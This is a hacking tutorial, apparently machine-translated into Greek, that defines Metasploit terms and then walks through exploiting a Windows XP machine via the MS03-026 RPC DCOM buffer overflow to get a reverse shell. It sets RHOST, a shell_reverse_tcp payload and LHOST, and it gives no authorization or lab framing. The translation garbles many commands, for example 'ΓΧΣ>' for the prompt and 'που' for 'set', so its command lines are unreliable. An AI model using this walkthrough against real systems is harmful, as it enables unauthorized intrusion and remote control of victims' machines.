Σε μου πρώτη δόση σε αυτή τη σειρά για τα επαγγελματικά εργαλεία hacking, θα κατεβάσει και εγκαταστήσει Metasploit, το πλαίσιο εκμετάλλευσης. Τώρα, θα αρχίσουμε να εξερευνήσετε το πλαίσιο Metasploit και να ξεκινήσει μια δοκιμασμένη και αληθινή hack.
Πριν αρχίσουμε hacking, ας εξοικειωθούμε με Metasploit, έτσι ώστε όταν χρησιμοποιούν ορισμένους όρους, όλοι να καταλάβουν για να σημαίνουν το ίδιο πράγμα. Κατά την πρώτη εξέταση στο πλαίσιο Metasploit, μπορεί να είναι λίγο συντριπτική με τις διάφορες διασυνδέσεις, τις επιλογές, τις υπηρεσίες και μονάδες. Εδώ θα προσπαθήσουμε να γίνει κατανοητό, ώστε να μπορούμε να εκτελέσουμε το πρώτο μας εκμεταλλεύονται.
Ορολογία
Η ακόλουθη ορολογία δεν χρησιμοποιείται μόνο εντός του πλαισίου Metasploit, αλλά και σε ολόκληρη την επαγγελματική hacking και δοκιμών διείσδυσης κοινότητες. Ως αποτέλεσμα, κάθε επαγγελματίας σε αυτόν τον τομέα θα πρέπει να είναι εξοικειωμένοι με αυτούς τους όρους και να είναι σε θέση να διακρίνουν σαφώς τους.
- Αξιοποίηση
Αξιοποίηση είναι το μέσο με το οποίο ένας εισβολέας εκμεταλλεύεται ένα ελάττωμα ή ευπάθεια σε ένα δίκτυο, την εφαρμογή ή υπηρεσία. Ο χάκερ χρησιμοποιεί αυτό το ελάττωμα ή την ευπάθεια με τέτοιο τρόπο ώστε ο κύριος του έργου ή μηχανικός οποίες δεν είχαν προβλεφθεί, για την επίτευξη του επιθυμητού αποτελέσματος (π.χ. πρόσβαση root). Κάποιοι πιο κοινά κατορθώματα που έχετε ίσως ήδη ακούσει είναι SQL ενέσεις, υπερχειλίσεις buffer, κλπ.
- Ωφέλιμο φορτίο
Ένα ωφέλιμο φορτίο είναι το πρόγραμμα ή κώδικα που παραδίδεται στο σύστημα θύμα. Metasploit έχει προ-χτισμένη ωφέλιμα φορτία για το σκοπό αυτό περιλαμβάνεται στο εξαιρετικά χρήσιμο Meterpreter, ή μπορείτε να αναπτύξετε τη δική σας. Αυτό το ωφέλιμο φορτίο έχει σχεδιαστεί για να παρέχει τον επιτιθέμενο με κάποια ικανότητα να διαχειριστεί ή να χειριστείτε το σύστημα στόχο για τις ιδιαίτερες ανάγκες τους.
- Shellcode
Αυτό είναι ένα σύνολο οδηγιών που χρησιμοποιείται ως ωφέλιμο φορτίο, όταν λαμβάνει χώρα η εκμετάλλευση. Shellcode είναι συνήθως γραμμένο σε συμβολική γλώσσα, αλλά όχι απαραίτητα πάντα. Λέγεται "shellcode" επειδή ένα περιβάλλον γραμμής εντολών ή άλλη κονσόλα εντολών παρέχεται στον εισβολέα που μπορεί να χρησιμοποιηθεί για να εκτελέσει τις εντολές στον υπολογιστή του θύματος.
- Ενότητα
Μια λειτουργική μονάδα είναι ένα κομμάτι του λογισμικού που μπορεί να χρησιμοποιηθεί από το πλαίσιο Metasploit. Οι ενότητες αυτές είναι εναλλάξιμα και να δώσει Metasploit μοναδική δύναμη του. Οι ενότητες αυτές θα μπορούσαν να εκμεταλλευτούν ενότητες ή βοηθητικές μονάδες.
- Ακροατής
Αυτό είναι ότι η συνιστώσα που ακούει για τη σύνδεση από το σύστημα του χάκερ στο σύστημα στόχο. Ο ακροατής χειρίζεται απλά τη σύνδεση μεταξύ αυτών των συστημάτων.
- Σόου
Πλαίσιο Metasploit έχει εκατοντάδες των ενοτήτων και άλλα βοηθητικά προγράμματα. Ως εκ τούτου, δεν θα είναι σε θέση να τα θυμάμαι όλα.Ευτυχώς, η εντολή show μπορεί να αρπάξει μια λίστα με όλες τις μονάδες, τις επιλογές, τους στόχους, κλπ. στο πλαίσιο σας.
Τώρα που έχουμε τα βασικά του Metasploit έννοιες και εντολές προς τα κάτω, ας χαράξει ένα σύστημα!
Βήμα 1: Ξεκινώντας
Κατ 'αρχάς, ανοίξτε ένα τερματικό στο Linux.
Μια από τις πιο αξιόπιστες αμυχές είναι το πανταχού παρόν σύστημα Windows XP με το RPC DCOM . Είναι ένα buffer overflow επίθεση που επιτρέπει στον εισβολέα να εκτελέσει οποιοδήποτε κώδικα της επιλογής τους στο πλαίσιο ανήκει (σημειώστε το σχόλιο της Microsoft υπό την επίδραση της ευπάθειας). Microsoft προσδιορίζει ως MS03-026 στη βάση δεδομένων των προβλημάτων τους. Στην περίπτωσή μας, εμείς θα το χρησιμοποιήσετε για να ανοίξετε μια αντίστροφη κέλυφος στο σύστημα στόχο μας.
Ανοίξτε το Metasploit την κονσόλα.
msfconsole
Να είστε υπομονετικοί, παίρνει λίγο χρόνο για Metasploit να φορτώσει όλες τις λειτουργικές μονάδες της. Η τρέχουσα έκδοση του Metasploit έχει 823 εκμεταλλεύεται και 250 ωφέλιμα φορτία.
Βήμα 2: Βρείτε την Αξιοποίηση
Metasploit επιτρέπει να κάνετε αναζήτηση χρησιμοποιώντας την εντολή αναζήτησης. Στην περίπτωσή μας, είμαστε ψάχνουν για μια DCOM εκμεταλλευτεί, ώστε να μπορούμε απλά να πληκτρολογήσετε:
ΓΧΣ> αναζήτηση dcom
Βήμα 3: Ρυθμίστε την Αξιοποίηση
Τώρα, ας πω τι εκμεταλλεύονται Metasploit θέλουμε να χρησιμοποιήσουμε.Πληκτρολογήστε τη χρήση και το όνομα του εκμεταλλεύονται μας, exploit/windows/dcerpc/ms03_026_dcom.
ΓΧΣ> χρησιμοποιούν exploit/windows/dcerpc/ms03_026_dcom
Σημειώστε ότι η γραμμή έχει αλλάξει και τώρα αντικατοπτρίζει επιλεγεί μας εκμεταλλεύονται.
Βήμα 4: Ρύθμιση των επιλογών
Τώρα που έχουμε επιλέξει εκμεταλλεύονται μας, μπορούμε να ρωτήσουμε Metasploit ποιες είναι οι επιλογές μας. Με την πληκτρολόγηση επιλογές δείχνουν, Metasploit θα απαριθμήσει τις επιλογές μας στην εκτέλεση αυτό το εκμεταλλεύονται.
Επιλογές ΓΧΣ> show
Βήμα 5: Ρύθμιση Remote Host
Metasploit θα μας ρωτήσει τώρα για την Rhost. Αυτή θα είναι η διεύθυνση IP του απομακρυσμένου υπολογιστή ή το μηχάνημα είμαστε επιτίθενται.Στην περίπτωσή μας, είναι 10.0.0.3. Χρησιμοποιήστε την πραγματική διεύθυνση IP του μηχανήματος σας επιτίθενται. Εργαλεία όπως το nmap μπορεί να βοηθήσει στον εντοπισμό της διεύθυνσης IP του μηχανήματος σας επιτίθενται. Ανακοίνωση στην παραπάνω εικόνα αυτού του Metasploit μας λέει ότι θα πρέπει να χρησιμοποιούν το λιμάνι (δεσμευτική) 135.
ΓΧΣ> που Rhost 10.0.0.3
Βήμα 6: Εμφάνιση Payloads
Στη συνέχεια, ελέγξτε για να δείτε τι ωφέλιμα φορτία είναι διαθέσιμα για αυτό το εκμεταλλεύονται. Τύπος show ωφέλιμα φορτία στο Metasploit προτροπή:
ΓΧΣ> show ωφέλιμα φορτία
Βήμα 7: Ρύθμιση Ωφέλιμο φορτίο
Τώρα που μπορούμε να δούμε τι ωφέλιμα φορτία είναι διαθέσιμες, μπορούμε να επιλέξετε το γενικό / shell_reverse_tcp με τη χρήση του Metasploit κονσόλα που εντολών. Αν είναι επιτυχής, αυτό θα δημιουργήσει ένα απομακρυσμένο κέλυφος για το σύστημα στόχο που μπορούμε να την εντολή.
ΓΧΣ> που ΩΦΕΛΙΜΟ γενικής / shell_reverse_tcp
Βήμα 8: Set Local Host
Τώρα που έχουμε επιλέξει το εκμεταλλεύονται και το ωφέλιμο φορτίο, πρέπει να πούμε Metasploit τη διεύθυνση IP του μηχανήματος μας επιτίθενται. Σε αυτό το παράδειγμα, το σύστημα στόχος μας έχει μια διεύθυνση IP 10.0.0.6. Χρησιμοποιήστε την πραγματική διεύθυνση IP του συστήματος σας επιτίθενται. Εργαλεία ένα τέτοιο nmap, μπορεί να σας βοηθήσει να αποκτήσετε τις διευθύνσεις IP.
ΓΧΣ> που LHOST 10.0.0.6
Βήμα 9: Αξιοποίηση
Τώρα έχουμε εντολή Metasploit να αξιοποιήσει το σύστημα:
ΓΧΣ> εκμεταλλεύονται
Βήμα 10: Ανοίξτε ένα κοχύλι Hacked System
Πληκτρολογήστε τους εντολή συνεδρίες-i 1 για να ανοίξετε ένα κέλυφος εντολών στο σύστημα XP που θα εμφανιστεί στο Metasploit κονσόλα σας.
συνεδρίες-i 1
Για να επιβεβαιώσετε ότι το κέλυφος εντολή είναι για το σύστημα των Windows XP, πληκτρολογήστε dir για να πάρετε μια λίστα καταλόγων για το σύστημα των Windows XP που έχετε τώρα το δικό του!
C:> dir
Συγχαρητήρια! Έχετε μόλις hacked το πρώτο σας σύστημα χρησιμοποιώντας Metasploit!
Σε επόμενα μαθήματα μου, θα εξετάσουμε hacking συστήματα Linux και να σας παρουσιάσουμε το ισχυρό Meterpreter, ιδιόκτητο ωφέλιμο φορτίο Metasploit του.
0 σχόλια:
Δημοσίευση σχολίου